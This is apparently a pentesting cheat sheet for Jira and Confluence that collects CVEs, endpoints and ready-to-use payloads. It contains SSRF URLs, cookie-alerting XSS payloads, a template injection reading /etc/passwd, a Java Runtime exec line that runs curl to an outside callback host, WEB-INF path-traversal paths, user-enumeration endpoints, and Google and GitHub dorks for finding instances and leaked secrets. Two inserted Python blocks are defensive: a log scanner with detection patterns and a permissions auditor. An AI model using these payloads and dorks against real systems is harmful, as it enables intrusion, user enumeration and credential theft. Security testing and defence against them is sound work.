https://blog.csdn.net/caiqiiqi/article/details/89017806
/plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.google.nl
https://ecosystem.atlassian.net/browse/OAUTH-344
I exploited an SSRF vulnerability in Confluence and was able to perform several actions, such as bypassing firewall/protection solutions, performing XSPA by assessing the response times for ports, and accessing internal DoD servers and internal services.
I discuss the vulnerabilities exploited in my write-up, which you can find here: https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a
https://host/plugins/servlet/oauth/users/icon-uri?consumerUri=https://ipinfo.io/json
https://hackerone.com/reports/380354
https://jira.atlassian.com/browse/JRASERVER-67289
HOW TO EXPLOIT:
https://host/issues/?filter=-8
1. Go to the link above.
2. Click the "Updated Range:" text area.
3. Put your XSS payload in "More than [ ] minutes ago" (15 character payload limit) or in "In range [ ] to [ ]" (no length limit; ONLY put the payload in the first box).
4. Click Update. The payload will run. If it doesn't run, chances are you used double quotes somewhere. Only use single quotes!
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: JIRA
...
{"contentId":"1","macro":{"name":"widget","params":{"url":"https://www.viddler(.)com/v/23464dc5","width":"1000","height":"1000","_template":"file:///etc/passwd"},"body":""}}
/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert(1)%3C%2fscript%3Et1nmk&Search=Search ConfigurePortalPages.jspa
Information disclosure vulnerability: https://jira.atlassian.com/browse/JRASERVER-69242
Visit the URL below to check whether a given user exists on this host:
/rest/api/2/user/picker?query=admin
So the attacker can enumerate all existing users on this Jira server.
https://jira.atlassian.com/browse/JRASERVER-69241
Visiting the URL below leaks some of the server's information:
/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
Summary:
The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.
Vulnerable endpoint:
https://example.com/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
By manipulating the query= parameter you can enumerate groups/users.
Impact:
Information disclosure
Links:
https://github.com/mufeedvh/CVE-2019-8449
https://jira.atlassian.com/browse/JRASERVER-69796
https://nvd.nist.gov/vuln/detail/CVE-2019-8449
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8449
https://www.cvedetails.com/cve/CVE-2019-8449/
The /plugins/servlet/gadgets/makeRequest resource in Jira before version 8.4.0 allows remote attackers to access the content of internal network resources via a Server Side Request Forgery (SSRF) vulnerability due to a logic bug in the JiraWhitelist class.
https://jira.atlassian.com/browse/JRASERVER-69793?jql=labels%20%3D%20
PoC:
A request sent to http://vulnerablehost.com/plugins/servlet/gadgets/makeRequest?url=http://vulnerablehost.com@http://targethost.com will be redirected to targethost.com.
$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('curl http://xyz.burp(.)net').waitFor()
https://hackerone.com/reports/706841
/secure/ContactAdministrators!default.jspa
Atlassian Jira Server and Data Center allow remote, unauthenticated attackers to view custom field names and custom SLA names via an Information Disclosure vulnerability in the /secure/QueryComponent!Default.jspa endpoint.
https://jira.atlassian.com/browse/JRASERVER-71536
POC: https://victomhost/secure/QueryComponent!Default.jspa
Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the /ViewUserHover.jspa endpoint.
Ref: https://jira.atlassian.com/browse/JRASERVER-71560?jql=text%20~%20%22cve-2020-14181%22
POC: https://victomhost/secure/ViewUserHover.jspa
https://victomhost/ViewUserHover.jspa?username=Admin
/plugins/servlet/Wallboard/?dashboardId=10100&dashboardId=10101&cyclePeriod=(function(){alert(document.cookie);return%2030000;})()&transitionFx=none&random=true
Vulnerable to Server Side Request Forgery (SSRF).
This allowed an XSS and/or an SSRF attack to be performed. For more information about the Atlassian OAuth plugin issue, see https://ecosystem.atlassian.net/browse/OAUTH-344. When running in an environment like Amazon EC2, this flaw can be used to access a metadata resource that provides access credentials and other potentially confidential information.
If it doesn't run and instead redirects to the login panel, try the request with curl.
Affected software: Atlassian Jira Data Center, Jira Server (also tested on Jira Project Management Software)
Affected version: Before version 8.13.5, and from version 8.14.0 before version 8.15.1
CVE ID: CVE-2020-36287
CVSS Score: 5.3 (Medium)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Fully Patched Version: 8.13.5, 8.15.1, 8.16.0
Link: https://site.com/secure/Dashboard.jspa
POC: https://site.com/rest/dashboards/1.0/10000/gadget/{ID}/prefs
POC: https://github.com/f4rber/CVE-2020-36287
https://www.rapid7.com/db/vulnerabilities/atlassian-jira-cve-2020-36287/
https://jira.atlassian.com/browse/JRASERVER-72258 [Anonymously accessible Dashboards can leak private information via configured gadgets CVE-2020-36287]
Vulnerable:
Jira < 8.5.13
8.6.0 ≤ Jira < 8.13.5
8.14.0 ≤ Jira < 8.15.1
Summary:
The remote web server hosts a web application that is affected by an information disclosure vulnerability.
Affected endpoint:
https://example.com/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin
Description:
The instance of Atlassian Jira hosted on the remote web server is affected by an information disclosure vulnerability in QueryComponentRendererValue!Default.jspa due to an improper access restriction. An unauthenticated, remote attacker can exploit this, by sending a specially crafted HTTP request, to disclose sensitive information which may aid in further attacks.
Solution:
Upgrade to Atlassian Jira version 8.5.15 / 8.13.1 / 8.17.0 or later.
References:
https://jira.atlassian.com/browse/JRASERVER-71559
http://www.nessus.org/u?b658a05a
Description:
CVE-2021-26084 is an Object-Graph Navigation Language (OGNL) injection vulnerability in the Atlassian Confluence Webwork implementation. An unauthenticated, remote attacker could exploit this flaw by sending a specially crafted request to vulnerable endpoints on the Confluence Server or Data Center instance. Successful exploitation would allow an attacker to execute arbitrary code.
Vulnerable:
According to Atlassian’s official description, the company has released updates for versions 6.13.23, 7.4.11, 7.11.6, 7.12.5, and 7.13.0. That leaves CVE-2021-26084 exploitable on Confluence Server versions preceding 6.13.23, from 6.14.0 to 7.4.11, from 7.5.0 to 7.11.6, and from 7.12.0 to 7.12.5. This vulnerability does not affect Confluence Cloud users.
Exploit:
https://github.com/march0s1as/CVE-2021-26084
PoC:
/_/;/WEB-INF/web.xml
/_/;/WEB-INF/decorators.xml
/_/;/WEB-INF/classes/seraph-config.xml
/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
/_/%3B/WEB-INF/web.xml
/_/%3B/WEB-INF/decorators.xml
/_/%3B/WEB-INF/classes/seraph-config.xml
/_/%3B/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
/_/%3B/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
/_/%3B/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/_/%3B/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
References:
https://github.com/ColdFusionX/CVE-2021-26086
https://raw.githubusercontent.com/crowdsecurity/sec-lists/master/web/jira_cve_2021-26086.txt
https://github.com/assetnote/jira-mobile-ssrf-exploit
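A defender-side check, added here and not part of the original page or of any linked tool, that scans web-server access-log lines for the path-traversal PoC paths above and for the other enumeration/SSRF endpoints collected on this page. The log lines are constructed samples, and the format is assumed to be the Apache/nginx combined log format.

```python
import re
from typing import List, Tuple

# Detection patterns for the Jira/Confluence endpoints collected on this page.
# Each entry is (rule name, regex applied to the request target: path plus query string).
RULES = [
    ("path-traversal-semicolon", re.compile(r"/_/(?:;|%3[bB])/(?:WEB-INF|META-INF)/", re.I)),
    ("user-enumeration", re.compile(
        r"/rest/api/(?:2|latest)/(?:user/picker|groupuserpicker)\?|"
        r"ViewUserHover\.jspa|/secure/popups/UserPickerBrowser\.jspa", re.I)),
    ("gadget-makerequest-ssrf", re.compile(r"/plugins/servlet/gadgets/makeRequest\?.*url=", re.I)),
    ("oauth-icon-uri-ssrf", re.compile(r"/plugins/servlet/oauth/users/icon-uri\?.*consumerUri=", re.I)),
    ("wallboard-cycleperiod-xss", re.compile(r"/plugins/servlet/Wallboard/?\?.*cyclePeriod=", re.I)),
    ("seraph-bypass-wbsgantt", re.compile(r"/secure/WBSGanttManageScheduleJobAction\.jspa;", re.I)),
]

# Combined log format: the method and request target sit inside the quoted request line.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def classify_request(target: str) -> List[str]:
    """Return the names of every rule that matches one request target."""
    return [name for name, rx in RULES if rx.search(target)]


def scan_log(lines) -> List[Tuple[int, str, str]]:
    """Return (line number, rule name, request target) for each suspicious request."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        for name in classify_request(m.group("target")):
            hits.append((n, name, m.group("target")))
    return hits


# Constructed sample access-log lines (not captured from any real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /secure/Dashboard.jspa HTTP/1.1" 200 5120',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /rest/api/latest/groupuserpicker?query=1&maxResults=50000 HTTP/1.1" 200 9000',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /_/%3B/WEB-INF/web.xml HTTP/1.1" 200 4100',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /plugins/servlet/gadgets/makeRequest?url=http://example.com@http://internal.example/ HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for n, rule, target in scan_log(SAMPLE_LOG):
        print(f"line {n}: {rule}: {target}")
```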
Description:
A vulnerability in Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.
Vulnerable endpoint: /secure/WBSGanttManageScheduleJobAction.jspa;
https://github.com/Pear1y/CVE-2022-0540-RCE
https://bugalert.org/content/notices/2022-04-20-jira.html
https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/
https://nvd.nist.gov/vuln/detail/CVE-2022-0540
https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20
https://host/secure/popups/UserPickerBrowser.jspa
https://victomhost/rest/api/2/dashboard?maxResults=100
jira-unauth-popular-filters
https://victomhost/secure/ManageFilters.jspa?filter=popular&filterView=popular
https://hackerone.com/reports/197726
https://newrelic.atlassian.net/secure/ManageFilters.jspa?filterView=popular
https://newrelic.atlassian.net/secure/ManageFilters.jspa?filterView=search
https://hackerone.com/reports/139970
https://host/secure/ConfigurePortalPages!default.jspa?view=popular
https://host/secure/ManageFilters.jspa?filterView=search&Search=Search&filterView=search&sortColumn=favcount&sortAscending=false
/pages/%3CIFRAME%20SRC%3D%22javascript%3Aalert(‘XSS’)%22%3E.vm
Inside a Jira instance any user (even non-authenticated) can check their privileges at /rest/api/2/mypermissions or /rest/api/3/mypermissions. These endpoints return the caller's current privileges. If a non-authenticated user has any privilege, this is a vulnerability (bounty?). If an authenticated user has any unexpected privilege, this is also a vulnerability.
curl https://jira.some.example.com/rest/api/2/mypermissions | jq | grep -iB6 '"havePermission": true'
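As an added example (not from the page or from Atlassian), a small audit helper that does the same job as the curl/jq/grep pipeline above but also compares the grants against an allow-list, so an anonymous run flags every grant and an authenticated run flags only unexpected ones. The sample response is constructed and assumes the endpoint's JSON shape: a `permissions` object keyed by permission key, each entry carrying a `havePermission` boolean.

```python
import json
import urllib.request
from typing import Dict, List, Set

# Constructed sample of the JSON returned by /rest/api/2/mypermissions, trimmed to a few
# global permissions (not captured from a real server; key names assumed).
SAMPLE_RESPONSE = json.dumps({
    "permissions": {
        "BROWSE_USERS": {"key": "BROWSE_USERS", "name": "Browse Users",
                         "type": "GLOBAL", "havePermission": True},
        "ADMINISTER": {"key": "ADMINISTER", "name": "Jira Administrators",
                       "type": "GLOBAL", "havePermission": False},
        "CREATE_SHARED_OBJECTS": {"key": "CREATE_SHARED_OBJECTS", "name": "Create Shared Objects",
                                  "type": "GLOBAL", "havePermission": True},
        "BULK_CHANGE": {"key": "BULK_CHANGE", "name": "Bulk Change",
                        "type": "GLOBAL", "havePermission": False},
    }
})


def fetch_mypermissions(base_url: str) -> str:
    """Fetch /rest/api/2/mypermissions from a live instance with no session cookie,
    i.e. as the anonymous user (hypothetical helper; not exercised offline)."""
    url = base_url.rstrip("/") + "/rest/api/2/mypermissions"
    with urllib.request.urlopen(url, timeout=10) as resp:
        return resp.read().decode("utf-8")


def granted_permissions(body: str) -> List[str]:
    """Return the sorted permission keys the caller actually holds (havePermission is true)."""
    perms: Dict[str, dict] = json.loads(body).get("permissions", {})
    return sorted(k for k, v in perms.items() if v.get("havePermission") is True)


def unexpected_grants(body: str, allowed: Set[str] = frozenset()) -> List[str]:
    """Grants beyond the allow-list. For an anonymous request the allow-list is normally
    empty, so every grant returned here is a Global Permissions setting to review."""
    return [k for k in granted_permissions(body) if k not in allowed]


if __name__ == "__main__":
    for key in unexpected_grants(SAMPLE_RESPONSE):
        print("anonymous caller holds:", key)
```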
Affected endpoint:
https://example.com/secure/popups/UserPickerBrowser.jspa
Description:
By default, it’s only accessible to authenticated users. This function is used to search for a user and assign them tasks. It is a complete list of every user’s username and email address. There are three standard user groups in Jira: Administrators, Jira Users, and Anyone. For one reason or another, an administrator may grant the ‘Anyone’ group access to this functionality. This grants anyone access to the function – even anonymous users.
Authorization:
There are a couple of settings in Jira that, when not configured properly, may disclose information about the application and its users. This information may aid an attacker in gaining access to the application. This information disclosure is the result of an authorization misconfiguration in Jira’s Global Permissions settings. Jira uses role-based authorization where users are assigned to groups, and groups are assigned to one or more of the global permissions below.
Jira System Administrators
Jira Administrators
Browse Users
Create Shared Objects
Manage Group Filter Subscriptions
Bulk Changes
Configuration of global permissions is completely up to the application administrator. If they want to give Bob in accounting Jira System Administrators access, they can certainly do that. There are other less obvious configuration mistakes the results of which may be catastrophic.
Browse Users:
Upon discovering an instance of Jira, one of the first things I like to do is check for anonymous access to the user picker functionality located at /secure/popups/UserPickerBrowser.jspa
Fix:
1. Log in as a user with administrative privileges.
2. Click on the options menu at the top right of the window.
3. In the drop-down menu, click System.
4. On the left-hand side under Security, click the Global permissions link.
5. In the center screen under Jira Permissions, the Browse Users permission should not contain the Anyone user group.
Impact:
This information would be extremely useful in a more targeted password guessing or phishing campaign. If you can compromise an administrator account, all other users are effectively compromised. It’s best to assume that, no matter the security controls in place, at some point an attacker is going to find a way in. Therefore, storing sensitive information such as usernames and passwords in Jira is not recommended.
References:
https://medium.flatstack.com/misconfig-in-jira-for-accessing-internal-information-of-any-company-2f54827a1cc5 https://confluence.atlassian.com/adminjiraserver073/managing-global-permissions-861253290.html
Tools:
To automate retrieval of emails/usernames, use https://github.com/NetSPI/JIG
https://github.com/netspooky/jLoot
https://github.com/0x48piraj/Jiraffe
https://github.com/bcoles/jira_scan
https://github.com/MayankPandey01/Jira-Lens
[Jira-Lens is a Python-based vulnerability scanner for Jira. Jira is a proprietary issue tracking product developed by Atlassian that allows bug tracking and agile project management. This tool performs 25+ checks, including CVEs and multiple disclosures, on the provided Jira instance.]
inurl:/plugins/servlet/wallboard/
(This lists all the Jira wallboard dashboards, which might be vulnerable to XSS.) (Sensitive Data Exposure)
https://www.exploit-db.com/ghdb/6528
This is a test for Confluence (older versions); found CVE-2018-20824.
Created dork: inurl:"/plugins/servlet/Wallboard/"
Endpoint: /?dashboardId=10102&dashboardId=10103&cyclePeriod=(function(){alert(document.cookie);return%2030000;})()&transitionFx=fadeZoom&random=false
https://twitter.com/hackersden_/status/1417573513859244032
Useful Jira dorks:
inurl:"dashboard.jspa"
inurl:xyz intitle:JIRA login
site:*/JIRA/login
intitle:"Log In JIRA" inurl:"8080:/login.jsp"
intext:"Welcome to JIRA" "Powered by a free Atlassian Jira community"
inurl:companyname intitle:JIRA login
inurl:visma intitle:JIRA login
intext:"Confluence" ext:jsp intitle:"Jira"
inurl:http://confluence. login.action
inurl:https://wiki. .com/confluence/
allinurl: /confluence/login.action?
intitle:dashboard-confluence
inurl:/ContactAdministrators!default.jspa
inurl:/secure/attachment/ filetype:log OR filetype:txt
GitHub recon via GitHub dorks to find secrets:
"site[dot]com" send_keys
"site[dot]com" client_secret
"site[dot]com" jira/root password
https://github.com/sushantdhopat/JIRA_testing
https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/jira
https://github.com/NetSPI/JIG - https://medium.flatstack.com/misconfig-in-jira-for-accessing-internal-information-of-any-company-2f54827a1cc5
https://pentestbook.six2dez.com/enumeration/webservices/jira
https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md (Jira Common Bugs)